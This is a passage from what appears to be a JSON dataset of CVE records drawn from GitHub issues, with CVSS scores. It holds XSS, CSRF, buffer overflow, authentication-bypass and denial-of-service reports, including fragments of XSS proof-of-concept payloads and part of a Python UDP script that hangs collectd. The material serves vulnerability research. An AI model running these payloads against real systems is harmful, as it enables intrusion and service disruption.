could be used because the absence of authentication process in doing a change or the absence of unique token that can allowed to process the related matter (the uniqueness of the token is usually given so the user wouldn\u2019t be troubled by typing password to changes that are not quite significant). In this situation, the problem related lack of CSRF token could be found at a few features such as Colophon Changing (like a feature to change a web footer easily), User Deletion, and Navigation Social Changing (changing the URL to the malicious one). Please kindly note , as we learn a few things at APITAG CMS, we found that the protection is given with the needs of APITAG header of the HTTP/S Request. 
For example, when we tried to do a APITAG of CSRF at the APITAG User\u201d Feature, the feature needs the APITAG parameter to \u201ccompletely finishing\u201d the APITAG But at those NUMBERTAG three) mentioned feature, the protection is not given yet NUMBERTAG Colophon Feature In simple, this feature allows the users to write their own footer at the sidebar. By default, the value of Colophon is APITAG on APITAG CMS\" with embedded URL at the Product Name NUMBERTAG Nav Soc Feature APITAG Social) The feature allows the users to put their own social network with the provided URL and logos to the sidebar that exist at the application. III. Summary of Issue As it has been delivered before, the security problem in this report has a relation with APITAG of CSRF Token\u201d at separated parameter that could affects some changes like NUMBERTAG Deleting the Registered User (both of NUMBERTAG and NUMBERTAG Change the Colophon Information (both of NUMBERTAG and NUMBERTAG and NUMBERTAG Change the Navigation Social (both of NUMBERTAG and NUMBERTAG IV. Information and Situation of this APITAG To be able to understand the existed problem, this section will be re explaining the problem specifically about some information which is related to the general running process or even the root of the existed problem NUMBERTAG Deleting the Registered User with CSRF APITAG at Document NUMBERTAG Change the Colophon with CSRF APITAG at Document NUMBERTAG Change the Navigation Social with CSRF APITAG at Document). V. Additional Information NUMBERTAG For completing the explanation, the APITAG explanation are completed by the videos APITAG at Youtube, provided at document and via direct email to Tim NUMBERTAG And also the script that could be used to execute the APITAG ( provided at Document and via direct email to Tim). VI. 
References NUMBERTAG PCI DSS NUMBERTAG point NUMBERTAG for CSRF NUMBERTAG CAPEC NUMBERTAG Cross Site Request Forgery CVETAG NUMBERTAG CVETAG : Cross Site Request Forgery CVETAG NUMBERTAG URLTAG NUMBERTAG URLTAG VII. Document: FILETAG",
  13750. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H",
  13751. "severity": "HIGH",
  13752. "baseScore": 7.1,
  13753. "impactScore": 4.2,
  13754. "exploitabilityScore": 2.8
  13755. },
  13756. {
  13757. "CVE_ID": "CVE-2017-6958",
  13758. "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/205",
  13759. "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/205",
  13760. "Repo_new": "mantisbt-plugins/source-integration",
  13761. "Issue_Created_At": "2017-03-16T16:29:10Z",
  13762. "description": "XSS in search page. Dmitry Ivanov d1m0ck URLTAG reported NUMBERTAG a security vulnerability in the Source Integration plugin's search results page, allowing an attacker to inject arbitrary HTML or javascript code (the latter, only if APITAG default CSP are disabled NUMBERTAG URLTAG",
  13763. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13764. "severity": "MEDIUM",
  13765. "baseScore": 6.1,
  13766. "impactScore": 2.7,
  13767. "exploitabilityScore": 2.8
  13768. },
  13769. {
  13770. "CVE_ID": "CVE-2017-6967",
  13771. "Issue_Url_old": "https://github.com/neutrinolabs/xrdp/issues/350",
  13772. "Issue_Url_new": "https://github.com/neutrinolabs/xrdp/issues/350",
  13773. "Repo_new": "neutrinolabs/xrdp",
  13774. "Issue_Created_At": "2016-03-23T12:44:53Z",
  13775. "description": "Homedir gets not correctly created at first login. I'm opening this as a new issue, although my problems have already been started to be discussed at NUMBERTAG which has been marked as \"closed\" before finding a solution for my specific problem. Short summary here: I built xrdp upstream version and have a problem when connecting to the server for the very first time with a user. The server should then create a homedir (via pam_mkhomedir). The server is a member of an active directory, PAM is configured to authenticate via samba/winbind and create home directories for users on their first login. This works perfectly for e.g. ssh or other services but not for xrdp. I had a look at bugs NUMBERTAG and NUMBERTAG which seem similar but have a different background. The problem of these referenced bugs is that VNC needs some time to start up before connecting to it so a timeout (loop) has been implemented. This is not the case here. In this bug, VNC starts but there seems to be a problem with the order a full PAM based authentification. xrdp is supposed to first do the PAM authentication (which would initially creating a users' home directory) and then start VNC. This seems not to work as expected somehow... In general, the home directory gets created somewhen, but obviously too late in the process so that VNC spits out the error lines ERRORTAG If I kill the Xvnc process (or completely restart xrdp) and try it again (after the homedir got created while the first login try), it works. If I create the user's home directory manually it also works. I wasn't able to let PAM create the homedir before VNC starts, I tried almost every possible order of \"session\" entries (especially those with pam_mkhomedir.so at the beginning).",
  13776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  13777. "severity": "HIGH",
  13778. "baseScore": 7.3,
  13779. "impactScore": 3.4,
  13780. "exploitabilityScore": 3.9
  13781. },
  13782. {
  13783. "CVE_ID": "CVE-2017-7202",
  13784. "Issue_Url_old": "https://github.com/slims/slims7_cendana/issues/50",
  13785. "Issue_Url_new": "https://github.com/slims/slims7_cendana/issues/50",
  13786. "Repo_new": "slims/slims7_cendana",
  13787. "Issue_Created_At": "2017-03-03T17:35:23Z",
  13788. "description": "APITAG NUMBERTAG Cendana \u2013 Multiple Cross Site Scripting (XSS) . Product: APITAG NUMBERTAG Cendana Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered APITAG NUMBERTAG Cendana latest version\u201d, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201cid\u201d HTTP GET parameter passed to the PATHTAG and PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13789. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13790. "severity": "MEDIUM",
  13791. "baseScore": 6.1,
  13792. "impactScore": 2.7,
  13793. "exploitabilityScore": 2.8
  13794. },
  13795. {
  13796. "CVE_ID": "CVE-2017-7203",
  13797. "Issue_Url_old": "https://github.com/ZoneMinder/ZoneMinder/issues/1797",
  13798. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/1797",
  13799. "Repo_new": "zoneminder/zoneminder",
  13800. "Issue_Created_At": "2017-02-28T14:49:23Z",
  13801. "description": "APITAG Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP POST parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: Post: APITAG APITAG < To FILETAG",
  13802. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13803. "severity": "MEDIUM",
  13804. "baseScore": 6.1,
  13805. "impactScore": 2.7,
  13806. "exploitabilityScore": 2.8
  13807. },
  13808. {
  13809. "CVE_ID": "CVE-2017-7204",
  13810. "Issue_Url_old": "https://github.com/tboothman/imdbphp/issues/88",
  13811. "Issue_Url_new": "https://github.com/tboothman/imdbphp/issues/88",
  13812. "Repo_new": "tboothman/imdbphp",
  13813. "Issue_Created_At": "2017-02-27T18:18:59Z",
  13814. "description": "imdbphp (lastest version) Cross Site Scripting (XSS). Product\uff1aimdbphp Download: URLTAG Vunlerable Version: lastest version and probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201cimdbphp\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201cname\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13815. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13816. "severity": "MEDIUM",
  13817. "baseScore": 6.1,
  13818. "impactScore": 2.7,
  13819. "exploitabilityScore": 2.8
  13820. },
  13821. {
  13822. "CVE_ID": "CVE-2017-7205",
  13823. "Issue_Url_old": "https://github.com/devryan/GamePanelX-V3/issues/161",
  13824. "Issue_Url_new": "https://github.com/devryan/gamepanelx-v3/issues/161",
  13825. "Repo_new": "devryan/gamepanelx-v3",
  13826. "Issue_Created_At": "2017-03-02T16:59:10Z",
  13827. "description": "APITAG NUMBERTAG Cross Site Scripting (XSS). Product: APITAG NUMBERTAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ca\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13828. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13829. "severity": "MEDIUM",
  13830. "baseScore": 6.1,
  13831. "impactScore": 2.7,
  13832. "exploitabilityScore": 2.8
  13833. },
  13834. {
  13835. "CVE_ID": "CVE-2017-7231",
  13836. "Issue_Url_old": "https://github.com/Tatsh/pngdefry/issues/1",
  13837. "Issue_Url_new": "https://github.com/tatsh/pngdefry/issues/1",
  13838. "Repo_new": "tatsh/pngdefry",
  13839. "Issue_Created_At": "2017-03-22T17:16:53Z",
  13840. "description": "Heap Buffer Overflow Vulnerability in Pngdefry. This is to report a heap overflow vulnerability in Pngdefry. This issue affects the APITAG function of the 'pngdefry.c' source file. Valgrind reports Invalid write of size NUMBERTAG and Invalid read of size NUMBERTAG To reproduce this issue open the 'png file' with Pngdefry application. POC files attached below: FILETAG FILETAG FILETAG FILETAG",
  13841. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  13842. "severity": "HIGH",
  13843. "baseScore": 7.8,
  13844. "impactScore": 5.9,
  13845. "exploitabilityScore": 1.8
  13846. },
  13847. {
  13848. "CVE_ID": "CVE-2017-7235",
  13849. "Issue_Url_old": "https://github.com/Anorov/cloudflare-scrape/issues/97",
  13850. "Issue_Url_new": "https://github.com/anorov/cloudflare-scrape/issues/97",
  13851. "Repo_new": "anorov/cloudflare-scrape",
  13852. "Issue_Created_At": "2017-03-22T03:37:37Z",
  13853. "description": "Call APITAG My recommendation would be to remove the dependency on APITAG , but it looks like you don't want to go that way APITAG see this comment URLTAG , at least disable the pyimport statement, since it gives arbitrary code execution to any website that's scraped. And add the disclaimer that this library runs arbitrary code back to the README (which was removed in this commit URLTAG . You should also request a CVE ID.",
  13854. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  13855. "severity": "HIGH",
  13856. "baseScore": 8.8,
  13857. "impactScore": 5.9,
  13858. "exploitabilityScore": 2.8
  13859. },
  13860. {
  13861. "CVE_ID": "CVE-2017-7247",
  13862. "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/114",
  13863. "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/114",
  13864. "Repo_new": "whatcd/gazelle",
  13865. "Issue_Created_At": "2017-03-13T17:58:17Z",
  13866. "description": "Gazelle \u2013 Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG Post: torrents= APITAG APITAG alert NUMBERTAG APITAG APITAG To FILETAG NUMBERTAG Post: size= \" /> APITAG alert NUMBERTAG APITAG <input text=\"type To FILETAG",
  13867. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13868. "severity": "MEDIUM",
  13869. "baseScore": 6.1,
  13870. "impactScore": 2.7,
  13871. "exploitabilityScore": 2.8
  13872. },
  13873. {
  13874. "CVE_ID": "CVE-2017-7248",
  13875. "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/111",
  13876. "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/111",
  13877. "Repo_new": "whatcd/gazelle",
  13878. "Issue_Created_At": "2017-03-13T17:55:06Z",
  13879. "description": "Gazelle \u2013 Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ctype\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13880. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13881. "severity": "MEDIUM",
  13882. "baseScore": 6.1,
  13883. "impactScore": 2.7,
  13884. "exploitabilityScore": 2.8
  13885. },
  13886. {
  13887. "CVE_ID": "CVE-2017-7249",
  13888. "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/112",
  13889. "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/112",
  13890. "Repo_new": "whatcd/gazelle",
  13891. "Issue_Created_At": "2017-03-13T17:56:17Z",
  13892. "description": "Gazelle \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13893. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13894. "severity": "MEDIUM",
  13895. "baseScore": 6.1,
  13896. "impactScore": 2.7,
  13897. "exploitabilityScore": 2.8
  13898. },
  13899. {
  13900. "CVE_ID": "CVE-2017-7250",
  13901. "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/113",
  13902. "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/113",
  13903. "Repo_new": "whatcd/gazelle",
  13904. "Issue_Created_At": "2017-03-13T17:56:57Z",
  13905. "description": "Gazelle \u2013 Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201caction\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13906. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13907. "severity": "MEDIUM",
  13908. "baseScore": 6.1,
  13909. "impactScore": 2.7,
  13910. "exploitabilityScore": 2.8
  13911. },
  13912. {
  13913. "CVE_ID": "CVE-2017-7251",
  13914. "Issue_Url_old": "https://github.com/pi-engine/pi/issues/1523",
  13915. "Issue_Url_new": "https://github.com/pi-engine/pi/issues/1523",
  13916. "Repo_new": "pi-engine/pi",
  13917. "Issue_Created_At": "2017-03-08T14:24:46Z",
  13918. "description": "pi engine/pi \u2013 Cross Site Scripting (XSS). Product: pi engine/pi Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cpi engine/pi NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cpreview\u201d HTTP POST parameter passed to the the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: Post: preview=> APITAG alert NUMBERTAG APITAG < To FILETAG",
  13919. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13920. "severity": "MEDIUM",
  13921. "baseScore": 6.1,
  13922. "impactScore": 2.7,
  13923. "exploitabilityScore": 2.8
  13924. },
  13925. {
  13926. "CVE_ID": "CVE-2017-7274",
  13927. "Issue_Url_old": "https://github.com/radare/radare2/issues/7152",
  13928. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7152",
  13929. "Repo_new": "radareorg/radare2",
  13930. "Issue_Created_At": "2017-03-27T08:28:17Z",
  13931. "description": "Null pointer dereference in APITAG Null pointer dereference in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ERRORTAG",
  13932. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13933. "severity": "MEDIUM",
  13934. "baseScore": 5.5,
  13935. "impactScore": 3.6,
  13936. "exploitabilityScore": 1.8
  13937. },
  13938. {
  13939. "CVE_ID": "CVE-2017-7297",
  13940. "Issue_Url_old": "https://github.com/rancher/rancher/issues/8296",
  13941. "Issue_Url_new": "https://github.com/rancher/rancher/issues/8296",
  13942. "Repo_new": "rancher/rancher",
  13943. "Issue_Created_At": "2017-03-24T18:26:15Z",
  13944. "description": "Security Exposure: Any authenticated users can disable auth via API. Rancher Versions: Server NUMBERTAG Docker Version: Any OS and where are the hosts located? (cloud, bare metal, etc): Setup Details: (single node rancher vs. HA rancher, internal DB vs. external DB) Environment Type: ( PATHTAG ) Steps to Reproduce: Log into Rancher as an authenticated user (any role) and disable auth via the API. Results: Authentication is disabled.",
  13945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  13946. "severity": "HIGH",
  13947. "baseScore": 8.8,
  13948. "impactScore": 5.9,
  13949. "exploitabilityScore": 2.8
  13950. },
  13951. {
  13952. "CVE_ID": "CVE-2017-7386",
  13953. "Issue_Url_old": "https://github.com/citymont/symetrie/issues/3",
  13954. "Issue_Url_new": "https://github.com/citymont/symetrie/issues/3",
  13955. "Repo_new": "citymont/symetrie",
  13956. "Issue_Created_At": "2017-03-24T03:24:50Z",
  13957. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability. The vulnerability exists due to insufficient filtration of user supplied data in \"model\" HTTP parameter that will be passed to \" PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG PATHTAG NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13958. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13959. "severity": "MEDIUM",
  13960. "baseScore": 6.1,
  13961. "impactScore": 2.7,
  13962. "exploitabilityScore": 2.8
  13963. },
  13964. {
  13965. "CVE_ID": "CVE-2017-7387",
  13966. "Issue_Url_old": "https://github.com/TheFirstQuestion/HelpMeWatchWho/issues/1",
  13967. "Issue_Url_new": "https://github.com/thefirstquestion/helpmewatchwho/issues/1",
  13968. "Repo_new": "thefirstquestion/helpmewatchwho",
  13969. "Issue_Created_At": "2017-03-24T04:58:11Z",
  13970. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP parameter that will be passed to APITAG APITAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13971. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13972. "severity": "MEDIUM",
  13973. "baseScore": 6.1,
  13974. "impactScore": 2.7,
  13975. "exploitabilityScore": 2.8
  13976. },
  13977. {
  13978. "CVE_ID": "CVE-2017-7388",
  13979. "Issue_Url_old": "https://github.com/micwallace/wallacepos/issues/84",
  13980. "Issue_Url_new": "https://github.com/micwallace/wallacepos/issues/84",
  13981. "Repo_new": "micwallace/wallacepos",
  13982. "Issue_Created_At": "2017-03-28T15:31:12Z",
  13983. "description": "wallacepos \u2013 Cross Site Scripting (XSS). Product: wallacepos Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cwallacepos NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ctoken\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13984. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13985. "severity": "MEDIUM",
  13986. "baseScore": 6.1,
  13987. "impactScore": 2.7,
  13988. "exploitabilityScore": 2.8
  13989. },
  13990. {
  13991. "CVE_ID": "CVE-2017-7389",
  13992. "Issue_Url_old": "https://github.com/gunet/openeclass/issues/11",
  13993. "Issue_Url_new": "https://github.com/gunet/openeclass/issues/11",
  13994. "Repo_new": "gunet/openeclass",
  13995. "Issue_Created_At": "2017-03-28T17:54:13Z",
  13996. "description": "openeclass\u2013 Multiple Cross Site Scripting (XSS). Product: openeclass Download: URLTAG Vunlerable Version: Release NUMBERTAG and probably prior Tested Version: Release NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in \u201copeneclass APITAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13997. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13998. "severity": "MEDIUM",
  13999. "baseScore": 6.1,
  14000. "impactScore": 2.7,
  14001. "exploitabilityScore": 2.8
  14002. },
  14003. {
  14004. "CVE_ID": "CVE-2017-7390",
  14005. "Issue_Url_old": "https://github.com/andreas83/SocialNetwork/issues/84",
  14006. "Issue_Url_new": "https://github.com/andreas83/socialnetwork/issues/84",
  14007. "Repo_new": "andreas83/socialnetwork",
  14008. "Issue_Created_At": "2017-03-23T12:41:11Z",
  14009. "description": "APITAG \u2013 Cross Site Scripting (XSS). Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cmail\u201d HTTP POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: Post: mail=\" /> APITAG alert NUMBERTAG APITAG <input type=\"text To FILETAG",
  14010. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14011. "severity": "MEDIUM",
  14012. "baseScore": 6.1,
  14013. "impactScore": 2.7,
  14014. "exploitabilityScore": 2.8
  14015. },
  14016. {
  14017. "CVE_ID": "CVE-2017-7391",
  14018. "Issue_Url_old": "https://github.com/dweeves/magmi-git/issues/522",
  14019. "Issue_Url_new": "https://github.com/dweeves/magmi-git/issues/522",
  14020. "Repo_new": "dweeves/magmi-git",
  14021. "Issue_Created_At": "2017-03-18T14:45:05Z",
  14022. "description": "Magmi \u2013 Cross Site Scripting (XSS). Product: Magmi Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cprefix\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  14023. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14024. "severity": "MEDIUM",
  14025. "baseScore": 6.1,
  14026. "impactScore": 2.7,
  14027. "exploitabilityScore": 2.8
  14028. },
  14029. {
  14030. "CVE_ID": "CVE-2017-7401",
  14031. "Issue_Url_old": "https://github.com/collectd/collectd/issues/2174",
  14032. "Issue_Url_new": "https://github.com/collectd/collectd/issues/2174",
  14033. "Repo_new": "collectd/collectd",
  14034. "Issue_Created_At": "2017-02-13T14:17:14Z",
  14035. "description": "Endless loop in APITAG while statement (CPU drain). Version of collectd NUMBERTAG Operating system / distribution: Linux laptop NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jan NUMBERTAG UTC NUMBERTAG APITAG Expected behavior Working as usual Actual behavior After sending this payload, collectd seems to be entering endless APITAG loop in packet_parse consuming high CPU resources, possibly crash/gets killed after a while. Tasks NUMBERTAG total NUMBERTAG running NUMBERTAG sleeping NUMBERTAG stopped NUMBERTAG zombie APITAG NUMBERTAG us NUMBERTAG sy NUMBERTAG ni NUMBERTAG id NUMBERTAG wa NUMBERTAG hi NUMBERTAG si NUMBERTAG st APITAG Mem NUMBERTAG total NUMBERTAG free NUMBERTAG used NUMBERTAG buff/cache APITAG Swap NUMBERTAG total NUMBERTAG free NUMBERTAG used NUMBERTAG avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND NUMBERTAG collectd NUMBERTAG S NUMBERTAG collectd Steps to reproduce Below is a packet, python program that crafts the packet that causes this problem. dos.py import socket UDP_IP = APITAG UDP_PORT NUMBERTAG print \"UDP target IP:\", UDP_IP print \"UDP target port:\", UDP_PORT sock = APITAG Internet APITAG UDP PATHTAG APITAG UDP_PORT))",
  14036. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  14037. "severity": "HIGH",
  14038. "baseScore": 7.5,
  14039. "impactScore": 3.6,
  14040. "exploitabilityScore": 3.9
  14041. },
  14042. {
  14043. "CVE_ID": "CVE-2017-7446",
  14044. "Issue_Url_old": "https://github.com/albandes/helpdezk/issues/2",
  14045. "Issue_Url_new": "https://github.com/albandes/helpdezk/issues/2",
  14046. "Repo_new": "albandes/helpdezk",
  14047. "Issue_Created_At": "2017-04-05T13:40:24Z",
  14048. "description": "Multiple CSRF Remote Code Execution Vulnerability on APITAG NUMBERTAG Exploit Title : CSRF Remote Code Execution Vulnerability on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author : MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG Vendor Homepage : FILETAG Software Link : FILETAG Version NUMBERTAG Tested on : Windows Server NUMBERTAG Datacenter Evaluation CVSS: PATHTAG NUMBERTAG CRITICAL) I. Background: APITAG is a powerfull software that manages requests/incidents. It has all the needed requirements to an efficient workflow management of all processes involved in service execution. This control is done for internal demands and also for outsourced services. APITAG can be used at any company's area, serving as an support to the shared service center concept, beyond the ability to log all the processes and maintain the request's history, it can pass it through many approval levels. APITAG can put together advanced managing resources with an extremely easy use. Simple and intuitive screens make the day by day easier for your team, speeding up the procedures and saving up a lot of time. It is developped in objects oriented PHP language, with the MVC architecture and uses the templates system SMARTY. For the javascripts, JQUERY is used. II. Description: Cross Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. 
